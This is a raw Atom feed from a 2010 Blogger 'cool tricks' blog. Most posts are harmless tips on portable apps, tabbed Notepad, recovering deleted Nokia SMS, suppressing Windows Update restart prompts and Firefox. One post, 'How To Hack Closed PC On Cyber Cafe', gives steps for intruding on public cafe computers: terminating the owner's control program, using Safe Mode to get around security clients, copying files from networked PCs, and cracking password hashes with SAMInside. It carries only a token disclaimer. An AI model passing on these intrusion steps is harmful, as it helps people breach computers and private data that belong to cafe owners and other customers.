&lt;li&gt;&lt;a href="http://mac.softpedia.com/get/Business/FSuite-CD.shtml" target="_blank" title="collection of portable apps for Mac"&gt;FSuite&lt;/a&gt; [Mac, 668.3mb] – over 30 useful tools in one  file (Office,  Graphic,  Audio,  Video, Internet,  Developer Tools and   Games)&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;Portable Operating  Systems (’HowTo’ Articles)&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://nothickmanuals.info/doku.php?id=minivmac" target="_blank" title="MAC OS X on USB drive"&gt;Mac  OS Classic 7&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Portable Linux: &lt;a href="http://www.tuxmachines.org/node/14738%20/" target="_blank" title="portable Knoppix"&gt;Knoppix&lt;/a&gt;,  &lt;a href="http://www.debuntu.org/how-to-install-ubuntu-linux-on-usb-bar" target="_blank" title="portable Ubuntu"&gt;Ubuntu&lt;/a&gt;, &lt;a href="http://www.hungry-hackers.com/2009/12/www.remote-exploit.org/backtrack.html" target="_blank" title="BackTrack"&gt;BackTrack&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.tomshardware.com/2005/09/09/windows_in_your_pocket/index.html" target="_blank" title="how to make XP portable"&gt;Win XP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;That’s mainly it… In case you’re looking for something that wasn’t  mentioned above, there are a couple of resources you may want to check  out. These are &lt;a href="http://www.portablefreeware.com/" target="_blank" title="standalone software"&gt;Portablefreeware.com&lt;/a&gt;  and &lt;a href="http://www.tinyapps.org/" target="_blank" title="portable software"&gt;Tinyapps.org&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-4981172854503128581?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/OE-oPBiSAfQOHuSLJUsBbCudx_A/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/OE-oPBiSAfQOHuSLJUsBbCudx_A/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/OE-oPBiSAfQOHuSLJUsBbCudx_A/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/OE-oPBiSAfQOHuSLJUsBbCudx_A/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/J4fSDgJYqwM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/4981172854503128581/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/100-free-portable-apps.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4981172854503128581?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4981172854503128581?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/J4fSDgJYqwM/100-free-portable-apps.html" title="100+ Free Portable Apps" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/100-free-portable-apps.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUMQns9eip7ImA9WxBUFEo.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-1044453885168164345</id><published>2010-03-01T06:53:00.000-08:00</published><updated>2010-03-01T11:54:43.562-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-01T11:54:43.562-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>How To Hack Closed PC On Cyber Cafe</title><content type="html">&lt;span id="goog_1267478488750"&gt;&lt;/span&gt;&lt;span id="goog_1267478488751"&gt;&lt;/span&gt;Hey all geeks,&lt;br /&gt;
Sorry for being away for almost a month, but guess what , got many  new tricks &amp;amp; hacks with me for&amp;nbsp; all of you.&lt;br /&gt;
So here is a quick new hack on how to intrude in the PC which is shut  downed at Cyber cafe.&lt;br /&gt;
&lt;b&gt;(Don’t Forget to read our disclaimer at  the bottom of the post.)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. As you all must have know these days all Cyber cafe owners have a  program for administration to control all PC’s in local area network. So  all files can be inter transmitted.&lt;br /&gt;
&lt;br /&gt;
2. First of all press Ctrl+Alt+Del the task manager or any  controlling application, will open. Then from APPLICATIONS select the  program that is controlling all PC’s&amp;nbsp; &amp;amp; terminate it, This is for  security reason. Now log of PC, &amp;amp; you ll get user names of the PC.&lt;br /&gt;
&lt;br /&gt;
3. But some times, cyber cafes have security clients installed that  have restricted access to Task Manager, restart the computer &amp;amp; press  F8 continuously before windows boots.&lt;br /&gt;
The Menu will open, select Safe Mode from it. And now you can copy  files from networked PC’s without any&amp;nbsp; security layer.&lt;br /&gt;
Next step is where you’ll need to crack the hashes.&amp;nbsp; SO go to your  home PC , Download &amp;amp; install Saminside cracking tool. And from some  another Cyber cafe try to crack the hashes of that PC. By same log off  method explained below.&lt;br /&gt;
This where you actually perform hacking. Have a gret time &amp;amp; tell  us weather it worked for you.&lt;br /&gt;
Meanwhile if you can get IP address,&amp;nbsp; of the PC you wish to hack try  to get it from ip-explorer.com, but this is not the part of this hack  its sort of next step of hacking from outside the network.&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Disclaimer :&lt;/b&gt;&lt;/i&gt; The trick here explained it  for educational purpose only &amp;amp; not to&amp;nbsp; perform illegal or criminal  activities. Don’t forget hacking into some one’s privacy is considered  as crime. SO do it on your home network that you own or something.&amp;nbsp; We  are not responsible for anything you do &amp;amp; consequences of it by  using our articles.&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-1044453885168164345?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GqCS2QGT3N0DoIJc80HmU4Cth68/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GqCS2QGT3N0DoIJc80HmU4Cth68/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GqCS2QGT3N0DoIJc80HmU4Cth68/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GqCS2QGT3N0DoIJc80HmU4Cth68/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/yxvRZKg1A48" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/1044453885168164345/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/how-to-hack-closed-pc-on-cyber-cafe.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/1044453885168164345?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/1044453885168164345?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/yxvRZKg1A48/how-to-hack-closed-pc-on-cyber-cafe.html" title="How To Hack Closed PC On Cyber Cafe" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/how-to-hack-closed-pc-on-cyber-cafe.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0MESXg8fip7ImA9WxBUFEk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-9041671299830026986</id><published>2010-03-01T05:16:00.000-08:00</published><updated>2010-03-01T05:16:48.676-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-01T05:16:48.676-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>How to open Tabs in Notepad?</title><content type="html">&lt;div class="separator" style="clear: both; text-align: left;"&gt;Are you tired of opening new instance of Notepad everytime you open a  new Text Document? If the answer to the above question is Yes then you  don’t have to worry about this anymore. You can use NotepadTabs to open  different Text Documents in the same instance in form of Tabs as in  Firefox.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/09/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="215" src="http://www.hungry-hackers.com/wp-content/uploads/2009/09/Capture.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;h2&gt;Features&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;Different from classic notepad, ‘Notepad Tabs’ gives the freedom to  view multiple text files in a single Notepad just like in IE7 and  Firefox, which saves you from the mess in the taskbar.&lt;/li&gt;
&lt;li&gt;Allows to open txt files with only one click.&lt;/li&gt;
&lt;li&gt;All the Keyboard Shortcuts present in Notepad works with this New  Version.&lt;/li&gt;
&lt;li&gt;You can easily select and navigate through open tabs in a single  Notepad programme.&lt;/li&gt;
&lt;li&gt;Before closing the application, it allows to save all opened tabs at  the same time.&lt;/li&gt;
&lt;li&gt;User friendly interface gives easy access to frequently used  commands.&lt;/li&gt;
&lt;li&gt;Unlike classic notepad you can choose 6 different themes; &lt;ul&gt;&lt;li&gt; Office 2007 Blue&lt;/li&gt;
&lt;li&gt; Office 2007 Silver&lt;/li&gt;
&lt;li&gt; Office 2007 Black&lt;/li&gt;
&lt;li&gt; Sparkle Blue&lt;/li&gt;
&lt;li&gt; Professional Office 2003&lt;/li&gt;
&lt;li&gt; Professional System&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h2&gt;Useful Tips&lt;/h2&gt;&lt;ol&gt;&lt;li&gt;To make NotepadTabs the default text editor, right click the txt  file and choose “Open With”, then click Browse and go to the NotepadTabs  directory under the Program Files and select NotepadTabs.exe. In the  “Open With” window, click the checkbox and press OK.&lt;/li&gt;
&lt;li&gt; If a problem occurs using NotepadTabs as default text editor after  re-installation (second time), you can use CCleaner (CCleaner works  fine, is compatible) to clean your computer and then follow the steps  explained in 1.&lt;/li&gt;
&lt;li&gt;To open a New Tab you can use the keyboard Shortcut &lt;strong&gt;Ctrl + T&lt;/strong&gt;  to open a new tab and &lt;strong&gt;Ctrl + W&lt;/strong&gt; to close the current  tab.&lt;/li&gt;
&lt;/ol&gt;&lt;h2&gt;Download&lt;/h2&gt;NotepadTabs is freely available to all. You can download it &lt;a href="http://www.notepadtabs.com/notepadtabs/7fd6a637-1689-4456-99e3-8bed70b170d4/d832d949-9f5b-4bb2-a50e-263554b58f9a/NotepadTabs_Setup.exe" target="_blank" title="NotepadTabs Download"&gt;Here.&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-9041671299830026986?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ysHbqMM99KAdURYLm0e_Kv-QLRM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ysHbqMM99KAdURYLm0e_Kv-QLRM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ysHbqMM99KAdURYLm0e_Kv-QLRM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ysHbqMM99KAdURYLm0e_Kv-QLRM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/0CyiqIVZFPk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/9041671299830026986/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/how-to-open-tabs-in-notepad.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/9041671299830026986?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/9041671299830026986?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/0CyiqIVZFPk/how-to-open-tabs-in-notepad.html" title="How to open Tabs in Notepad?" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/how-to-open-tabs-in-notepad.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMEQHo4eip7ImA9WxBUFEk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-4432630972338100546</id><published>2010-03-01T05:00:00.000-08:00</published><updated>2010-03-01T05:00:01.432-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-01T05:00:01.432-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>Recover Deleted SMS from SIM or Phone Memory for Free</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/10/data_loss.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://www.hungry-hackers.com/wp-content/uploads/2009/10/data_loss.gif" width="239" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Hello Friends, &lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Have you ever deleted a very important  SMS which you regret for the rest of your life? Are you searching for a  free SMS recovery Software? If the answer to above questions is &lt;strong&gt;Yes&lt;/strong&gt;  then you don’t have to worry anymore as today I will show you how to  recover deleted SMS from SIM card or Phone memory.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;There exist quite a few softwares to  recover deleted SMS messages from SIM cards and Phone memory, but all of  them require you to purchase the&lt;span style="color: #f8941d;"&gt; &lt;span style="color: black;"&gt;software&lt;/span&gt;&lt;/span&gt;&lt;a class="kLink" href="http://www.hungry-hackers.com/2009/10/recover-deleted-sms-from-sim-or-phone-memory-for-free.html#" id="KonaLink3" style="color: black; position: static; text-decoration: underline ! important;" target="undefined"&gt;&lt;span style="color: rgb(248, 148, 29) ! important; font-family: Arial,Helvetica; font-size: 12.35px; font-weight: 400; position: static;"&gt;&lt;span class="kLink" style="font-family: Arial,Helvetica; font-size: 12.35px; font-weight: 400; position: relative;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;.  However, if you own a Nokia phone you might be in luck, as there are  very good chances of message recovery from your cellphone without need  of any specialized data recovery software for free, simply follow the  step-by-step procedure below for important data recovery:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;span style="text-decoration: underline;"&gt;&lt;em&gt;Note&lt;/em&gt;&lt;/span&gt;: This trick does not work on Symbian  3rd Edition cellphones.&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;1. Download and install this free mobile  File Manager – FExplorer.&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;a href="http://www.easy-share.com/1908114840/FExplorer_english_117.SIS" title="File Explorer 
Download"&gt;&lt;em&gt;http://www.easy-share.com/1908114840/FExplorer_english_117.SIS&lt;/em&gt;&lt;/a&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;2. Launch FExplorer and navigate to C:  if you use Phone Memory to store your messages (default) and D: if you  use Storage Card as your SMS storage location.&lt;br /&gt;
3. Now navigate to and open “system” folder.&lt;br /&gt;
4. Now open the “mail” folder.&lt;br /&gt;
5. This folder should contain many folders named similar to 0010001_s  etc. with files named similar to 00100000 etc., These files are the  actual deleted messages, Simply, use the FExplorer inbuild text viewer  to view these files, You will need to browse through every folder and  open all files inside them until you get the required SMS.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-4432630972338100546?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/9hK0ZSyLgBiiRSPdf4P7gmOdfa8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9hK0ZSyLgBiiRSPdf4P7gmOdfa8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/9hK0ZSyLgBiiRSPdf4P7gmOdfa8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9hK0ZSyLgBiiRSPdf4P7gmOdfa8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/XrrT4rLt840" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/4432630972338100546/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/recover-deleted-sms-from-sim-or-phone.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4432630972338100546?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4432630972338100546?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/XrrT4rLt840/recover-deleted-sms-from-sim-or-phone.html" title="Recover Deleted SMS from SIM or Phone Memory for Free" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/recover-deleted-sms-from-sim-or-phone.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUNQno_fCp7ImA9WxBUFEk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-2997881706581159357</id><published>2010-03-01T03:34:00.003-08:00</published><updated>2010-03-01T03:34:53.444-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-01T03:34:53.444-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>How to Stop Annoying “Restart” Prompt after Windows Updates</title><content type="html">Windows users can find many things to complain about, but in my opinion,  the absolute worst “feature” of Windows is the Nagging Restart Dialog  Box.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/06/update.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://www.hungry-hackers.com/wp-content/uploads/2009/06/update.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;I’m sure you’ve had to deal with this.  It pops up every ten minutes after a major system update. Fortunately,  it can be turned off. I’m going to help you to create a shortcut that  will turn this nag off when double-clicked.&lt;/div&gt;&lt;h2 style="text-align: justify;"&gt;So, how to stop automatic updates from  restarting your PC&lt;/h2&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Step 1&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Your first step is to open Notepad.  (Start &amp;gt; Run &amp;gt; “Notepad” &amp;gt; OK)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/06/notepad1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://www.hungry-hackers.com/wp-content/uploads/2009/06/notepad1.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&amp;nbsp;In Notepad, just type the command “&lt;em&gt;&lt;strong&gt;net  stop wuauserv&lt;/strong&gt;&lt;/em&gt;” (no quotes, as in above). Then close the  window, and select “Yes” to save changes.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Step 2&lt;/strong&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/06/stopit.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://www.hungry-hackers.com/wp-content/uploads/2009/06/stopit.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;What we’re doing is creating an  executable batch file which will run a command when double-clicked, to  stop the Windows Automatic Updates Service. Make sure that your “&lt;em&gt;&lt;strong&gt;Save  as type&lt;/strong&gt;&lt;/em&gt;” is set to “&lt;strong&gt;&lt;em&gt;All Files&lt;/em&gt;&lt;/strong&gt;”  so that you don’t accidently create a text file. Save your file with an  extension of “&lt;strong&gt;&lt;em&gt;.bat&lt;/em&gt;&lt;/strong&gt;” for example “&lt;em&gt;&lt;strong&gt;stop  this.bat&lt;/strong&gt;&lt;/em&gt;” as shown above.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Step 3 &lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This cute little batch file is what  you’re left with.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/06/icon.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.hungry-hackers.com/wp-content/uploads/2009/06/icon.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;When Windows starts nagging you to  restart, just double click this to run it and stop the service. You  won’t be bothered again. The service will restart when you reboot, which  is needed to install the updates in the first place.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Is there anything that Windows does that  annoys you? Maybe we can find a fix for it. Are you aware of any easier  way to stop automatic updates from restarting your Windows. Please give  us some ideas in the comments.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-2997881706581159357?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/AS1PhnFzu1HBX5utw2d69XP7p6U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/AS1PhnFzu1HBX5utw2d69XP7p6U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/AS1PhnFzu1HBX5utw2d69XP7p6U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/AS1PhnFzu1HBX5utw2d69XP7p6U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/IYBMaaMHPMM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/2997881706581159357/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/how-to-stop-annoying-restart-prompt.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/2997881706581159357?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/2997881706581159357?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/IYBMaaMHPMM/how-to-stop-annoying-restart-prompt.html" title="How to Stop Annoying “Restart” Prompt after Windows Updates" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/how-to-stop-annoying-restart-prompt.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEDQn49fyp7ImA9WxBUFEg.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-6818913894076266534</id><published>2010-03-01T00:25:00.000-08:00</published><updated>2010-03-01T06:27:53.067-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-01T06:27:53.067-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>3 Firefox Tips You May Not Know About</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/06/firefox.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://www.hungry-hackers.com/wp-content/uploads/2009/06/firefox.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/06/firefox.jpg"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;br /&gt;
&lt;div id="stats" style="text-align: left;"&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div class="entry clearfloat"&gt;&lt;a href="http://www.facebook.com/sharer.php" name="fb_share" type="button_count"&gt;&lt;/a&gt;&lt;script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"&gt;
&lt;/script&gt;&lt;script type="text/javascript"&gt;
 
 if(typeof(hyperweb_adcount)=="undefined") hyperweb_adcount =1;
&lt;!--//&lt;![CDATA[
var m3_u = 'http://www.hyperwebads.com/test/delivery.php'
document.write ("&lt;scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?hyperweb_sitename="+document.domain);
document.write ('&amp;amp;hyperweb_adcount=' +hyperweb_adcount++);
document.write ('&amp;amp;hyperweb_location=top');
document.write ("'&gt;&lt;\/scr"+"ipt&gt;");
//]]
&lt;/script&gt;&lt;br /&gt;
The  thing I like best about Firefox is that just when you think you know  everything  there is to know about the browser, something new comes along and  surprises  you. &lt;br /&gt;
&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="float: right; margin-right: 5px; text-align: left;"&gt;&lt;script type="text/javascript"&gt;
     var topsy_nick = "hackingtruths";
     var topsy_style = "small";
     var topsy_order = "count,retweet,badge";
